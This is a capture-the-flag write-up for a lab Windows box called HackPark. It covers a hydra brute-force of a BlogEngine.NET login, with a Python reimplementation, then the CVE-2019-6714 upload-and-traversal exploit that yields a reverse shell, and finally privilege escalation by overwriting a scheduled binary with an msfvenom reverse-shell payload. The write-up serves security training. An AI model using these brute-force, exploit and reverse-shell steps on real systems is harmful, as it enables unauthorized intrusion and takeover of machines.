HackPark

Brute-force a website's login with Hydra, identify and use a public exploit, then escalate your privileges on this Windows machine!

Scanning

Nmap

root@ip-10-10-168-173:~# nmap -A -T4 10.10.134.173

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-22 10:57 BST
Nmap scan report for ip-10-10-134-173.eu-west-1.compute.internal (10.10.134.173)
Host is up (0.00063s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl     Microsoft SChannel TLS
. . .
[SNIP]
. . . 
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT     ADDRESS
1   0.63 ms ip-10-10-134-173.eu-west-1.compute.internal (10.10.134.173)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.99 seconds

Enumeration

Port 80

Nmap shows just two ports: 80 (IIS 8.5, which fits the Server 2012 R2 OS guess) and 3389 (RDP). The robots.txt entries point at /Account/, and /Account/login.aspx is a login form.

Let's brute-force that form with hydra. The general syntax is:

hydra -l [username] -P [passlist] $IP -V http-form-post "[directory]:[form_parameters]:[grep]"

[form_parameters] is the raw POST body of one login attempt, captured with Burp Suite, with the submitted username and password replaced by ^USER^ and ^PASS^ (hydra substitutes each candidate there). [grep] is a string that appears only in a failed-login response, here "Login failed": hydra reports a hit for any response that does not contain it, so choose the string carefully or you get false positives. The ASP.NET hidden fields __VIEWSTATE and __EVENTVALIDATION are copied from the capture and reused unchanged for every attempt, which this application accepts. hydra treats http-form-post as the same module as http-post-form, which is the name it prints in its output.

root@ip-10-10-168-173:~# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.134.173 -V http-form-post "/Account/login.aspx:__VIEWSTATE=b2CwLD0IPIzi7dLkyFWxkUryHhGnfYBRJyHrnU51xAbBhuUwFAKBG8T%2B%2B4huI8mfPiS0TnaLjBjDlN9dsQldDKOCacxfC7Gb6U%2B3e4xJbM1W%2BJrtJKrk705XrtJdX0%2BzRS3kmPSRjnsZ4VXmErgCZv6KwqbM6zmvKTSBnwQvVqmAhdevyUTi4tHSWsm1rSHsdS4Eo7giMx9u8d7fq7AyoucAM%2BwDHWeIn8hza%2B5HhpNgPcR67DuiJDK%2BcU7mbTUlkjSIn5oTcBeO1rjN4YMtfUn3gWFFutzWl8uUM7VogMzF0rIc2GJQZivNJv4749BCv0BgF0GWOxO2djsNcXB2R8FcQz7Txb2%2BcwY8xQAOZppirCfb&__EVENTVALIDATION=jBouW2RsCmg724dGBlbjFjo1G8xmqa0B7bYYok4D5ZNpiyl%2FDRWH5RcqOKSz9RNrhSf%2B9wldEYwPOH268Vauf4%2BREC1ZME4QLEs8DUf8gK0LC4QlRumMJskzmyATujGX0RlsBDZJlmlzRXYYcGiwjt0KIDSkjKZJGk7MBKlEESLfCz0H&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
. . .
[SNIP]
. . . 
[80][http-post-form] host: 10.10.134.173   login: admin   password: 1qaz2wsx

Credentials: admin:1qaz2wsx

We're in. In the admin panel the ABOUT tab gives the software version: BlogEngine.NET 3.3.6.0.
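As an added example (not part of the original write-up and not hydra's code), the Python below mirrors what the hydra command above does, so the mechanics are visible: pull the hidden ASP.NET fields from the login page, build the POST body with a candidate credential, and treat any response without the "Login failed" marker as a hit. The field names are the ones from the Burp capture; the login HTML, the mini wordlist and the stand-in server are constructed so it runs offline, and `post` is a caller-supplied callable (a hypothetical seam where a real run would send the HTTP request to /Account/login.aspx).

```python
"""Mirror of the hydra http-post-form run against /Account/login.aspx.

Added example, not from the HackPark write-up or from hydra.  The field
names come from the Burp capture above; the HTML, wordlist and stand-in
server below are constructed so the example runs offline.
"""
from html.parser import HTMLParser
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import parse_qs, urlencode

USER_FIELD = "ctl00$MainContent$LoginUser$UserName"
PASS_FIELD = "ctl00$MainContent$LoginUser$Password"
BUTTON_FIELD = "ctl00$MainContent$LoginUser$LoginButton"
FAIL_MARKER = "Login failed"  # hydra's [grep] string: present only on a failed login


class HiddenFieldParser(HTMLParser):
    """Collect every <input type="hidden" name=... value=...> on the page."""

    def __init__(self) -> None:
        super().__init__()
        self.fields: Dict[str, str] = {}

    def handle_starttag(self, tag, attrs) -> None:
        if tag != "input":
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value", "")


def hidden_fields(html: str) -> Dict[str, str]:
    """__VIEWSTATE, __EVENTVALIDATION, ... as name -> value."""
    p = HiddenFieldParser()
    p.feed(html)
    return p.fields


def build_login_body(login_html: str, username: str, password: str) -> str:
    """The x-www-form-urlencoded body of one attempt.

    urlencode() percent-encodes '$' and '=' exactly as seen in the hydra
    command (ctl00%24MainContent%24..., __VIEWSTATE=...%2B...).
    """
    form = hidden_fields(login_html)
    form[USER_FIELD] = username      # where hydra puts ^USER^
    form[PASS_FIELD] = password      # where hydra puts ^PASS^
    form[BUTTON_FIELD] = "Log in"
    return urlencode(form)


def login_succeeded(response_body: str) -> bool:
    """hydra's rule: no failure string in the response means a hit."""
    return FAIL_MARKER not in response_body


def brute_force(login_html: str, username: str, candidates: Iterable[str],
                post: Callable[[str], str]) -> Optional[str]:
    """Try each candidate password; return the first one that logs in.

    `post(body)` must submit the body to /Account/login.aspx and return the
    response text; it is injected so the loop can be exercised offline.
    """
    for password in candidates:
        if login_succeeded(post(build_login_body(login_html, username, password))):
            return password
    return None


# Constructed stand-in for GET /Account/login.aspx (real tokens are much longer).
SAMPLE_LOGIN_HTML = """
<form method="post" action="./login.aspx">
<input type="hidden" name="__VIEWSTATE" value="dGVzdA==" />
<input type="hidden" name="__EVENTVALIDATION" value="ZXY=" />
<input name="ctl00$MainContent$LoginUser$UserName" type="text" />
<input name="ctl00$MainContent$LoginUser$Password" type="password" />
<input type="submit" name="ctl00$MainContent$LoginUser$LoginButton" value="Log in" />
</form>
"""


def fake_server(body: str) -> str:
    """Constructed target that only accepts the credential found on this box."""
    form = parse_qs(body)
    ok = form.get(USER_FIELD) == ["admin"] and form.get(PASS_FIELD) == ["1qaz2wsx"]
    return "<html>Welcome, admin</html>" if ok else "<html>Login failed</html>"


if __name__ == "__main__":
    wordlist = ["password", "123456", "1qaz2wsx", "letmein"]  # constructed mini rockyou
    print("hit:", brute_force(SAMPLE_LOGIN_HTML, "admin", wordlist, fake_server))
```

Re-fetching the hidden fields per attempt (rather than reusing the captured ones as hydra does) is the change to make if a target ever starts rejecting stale __VIEWSTATE values; against HackPark the static values are accepted.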

Initial Access

Search for a public exploit for BlogEngine.NET 3.3.6.0 (searchsploit or Exploit-DB). The match is the BlogEngine.NET 3.3.6 directory traversal / remote code execution exploit (CVE-2019-6714): a PostView.ascx user control that, once uploaded and loaded through a traversed theme path, connects back with a shell. Its header describes the attack:

Attack:

First, we set the TcpClient address and port within the method below to 
our attack host, who has a reverse tcp listener waiting for a connection.

Next, we upload this file through the file manager.  In the current (3.3.6)
version of BlogEngine, this is done by editing a post and clicking on the 
icon that looks like an open file in the toolbar.  Note that this file must
be uploaded as PostView.ascx. Once uploaded, the file will be in the
/App_Data/files directory off of the document root. The admin page that
allows upload is:

http://10.10.10.10/admin/app/editor/editpost.cshtml

Finally, the vulnerability is triggered by accessing the base URL for the 
blog with a theme override specified like so:

http://10.10.10.10/?theme=../../App_Data/files

Let's follow the instructions (note that the target's IP is now 10.10.79.198):

  1. Start by modifying the script so that the TcpClient call reports our attack host's IP and port.

  2. Rename the script to PostView.ascx (that is the file name BlogEngine loads as the theme's post view).

  3. Go to posts (http://10.10.79.198/admin/#/content/posts) and click on "Welcome to HackPark" to edit this post.

  4. From the edit bar on top of the post, click on the "File Manager" icon.

  5. Click on the "+ UPLOAD" button and upload the PostView.ascx script; it lands in /App_Data/files.

  6. Close the file manager and click on "Save".

  7. Start the listener on the port chosen in step 1 (rlwrap nc -nlvp 1234).

  8. Trigger the payload by browsing to http://10.10.79.198/?theme=../../App_Data/files: the theme parameter traverses out of the themes directory, so BlogEngine compiles and runs our uploaded PostView.ascx.

Once that request is served, the listener receives a shell running as the IIS application pool identity:

$ rlwrap nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.79.198.
Ncat: Connection from 10.10.79.198:56475.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
whoami
c:\windows\system32\inetsrv>whoami
iis apppool\blog

Windows Privilege Escalation

Enumerate running services:

C:\> net start
OR
C:\> sc queryex type= service state= all | find /i "SERVICE_NAME:"

(sc needs the space after each = in type= and state=.)

WindowsScheduler looks interesting: it is a third-party scheduler (System Scheduler, installed under C:\Program Files (x86)\SystemScheduler), not the built-in Task Scheduler.

Check which account it runs as: the service's configuration shows it runs as LocalSystem, so whatever it launches is worth a look. Its install directory keeps a log of what it runs, and as whom:

C:\> cd "c:\program files (x86)"
C:\> dir /b
Common Files
Internet Explorer
Microsoft.NET
SystemScheduler
Uninstall Information
Windows Mail
Windows NT
WindowsPowerShell
desktop.ini

C:\> cd SystemScheduler
C:\> dir /b
Events
Forum.url
License.txt
LogFile.txt
LogfileAdvanced.txt
Message.exe
PlaySound.exe
PlayWAV.exe
Preferences.ini
Privilege.exe
ReadMe.txt
RunNow.exe
SSAdmin.exe
SSCmd.exe
SSMail.exe
Scheduler.exe
SendKeysHelper.exe
ShowXY.exe
ShutdownGUI.exe
WSCHEDULER.CHM
WSCHEDULER.HLP
WSCtrl.exe
WSLogon.exe
WSProc.dll
WScheduler.cnt
WScheduler.exe
WService.exe
Website.url
WhoAmI.exe
alarmclock.ico
clock.ico
ding.wav
libeay32.dll
sc32.exe
schedule.ico
ssleay32.dll
unins000.dat
unins000.exe
whiteclock.ico

C:\> cd events
C:\> dir /b
20198415519.INI
20198415519.INI_LOG.txt
Administrator.flg
SYSTEM_svc.flg
Scheduler.flg
SessionInfo.flg
service.flg

C:\> type 20198415519.INI_LOG.txt
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)
08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator)
08/04/19 16:47:00,Event Started Ok, (Administrator)

The log shows the event starting every minute (16:45:00, 16:46:00, 16:47:00) and each run launching Message.exe as Administrator, which exits a few seconds later with ExitCode 1. Whatever sits at that path is executed as Administrator on the next tick, so let's overwrite it with a reverse shell. Copy the original Message.exe aside first so the box can be put back afterwards.
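The two facts worth confirming from that log before touching Message.exe are which account the event runs as and how often it fires. As an added example (not from the write-up or from the scheduler vendor), the Python below parses the log format shown above and extracts both; the sample lines are the ones printed from 20198415519.INI_LOG.txt on this page, and the `hijackable` rule (a recurring event launching a binary under Administrator or SYSTEM) is my own criterion, not the tool's.

```python
"""Read the System Scheduler event log and confirm the hijack conditions.

Added example, not from the write-up or from the scheduler vendor.  Before
overwriting Message.exe we want two facts from the log: which account the
event runs as and how often it fires.  The sample lines below are the ones
printed from 20198415519.INI_LOG.txt on this page.
"""
import re
from datetime import datetime
from typing import Dict, Optional

# Copied from the page's `type 20198415519.INI_LOG.txt` output.
SAMPLE_LOG = """\
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)
08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator)
08/04/19 16:47:00,Event Started Ok, (Administrator)
"""

# Everything after the timestamp: a message, then the account in parentheses.
TRAILER = re.compile(r"(?P<msg>.*?)\s*\((?P<user>[^()]+)\)$")
# Present only on "Process Ended" lines.
PROCESS = re.compile(r"PID:(?P<pid>\d+),ExitCode:(?P<code>-?\d+),(?P<image>\S+)")
PRIVILEGED = {"Administrator", "SYSTEM"}   # accounts worth hijacking for (my rule)


def parse_line(line: str) -> Optional[Dict]:
    """One log line -> {time, user, started, image, exit_code}, or None if malformed."""
    ts, sep, rest = line.strip().partition(",")
    if not sep:
        return None
    m = TRAILER.fullmatch(rest.strip())
    if not m:
        return None
    try:
        when = datetime.strptime(ts, "%m/%d/%y %H:%M:%S")
    except ValueError:
        return None
    msg = m.group("msg")
    proc = PROCESS.search(msg)
    return {
        "time": when,
        "user": m.group("user"),
        "started": msg.startswith("Event Started"),
        "image": proc.group("image") if proc else None,
        "exit_code": int(proc.group("code")) if proc else None,
    }


def summarize(log_text: str) -> Dict:
    """Accounts seen, images launched, run count and the shortest gap between starts."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    starts = [e["time"] for e in events if e["started"]]
    gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
    return {
        "users": sorted({e["user"] for e in events}),
        "images": sorted({e["image"] for e in events if e["image"]}),
        "runs": len(starts),
        "interval_s": min(gaps) if gaps else None,
    }


def hijackable(summary: Dict) -> bool:
    """True when a recurring event launches a binary under a privileged account."""
    return (summary["interval_s"] is not None
            and bool(summary["images"])
            and any(u in PRIVILEGED for u in summary["users"]))


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print(s)
    print("worth overwriting", s["images"], "->", hijackable(s))
```

Run it against the real LogFile.txt or the event's INI_LOG.txt pulled off the box; the interval tells you how long to wait after overwriting the binary, and the account tells you what the resulting shell will be.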

Generate a reverse shell with msfvenom (a stageless payload, so a plain nc listener can catch it; the box is 64-bit Server 2012 R2):

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o rev.exe

Serve it from an SMB share on the attacker box (Impacket's smbserver.py is the usual choice), then on the target overwrite the scheduled binary with it:

copy \\[attacker_ip]\[share_name]\rev.exe "C:\Program Files (x86)\SystemScheduler\Message.exe"

The copy succeeding also confirms that the application pool identity can write to the scheduler directory; an "Access is denied" here would mean looking for another target.

Start a listener on $PORT (rlwrap nc -nlvp $PORT, as before) and wait. On its next run, within a minute, the scheduler fires the event again, executes our rev.exe as Administrator, and the listener receives the privileged shell; confirm it with whoami.
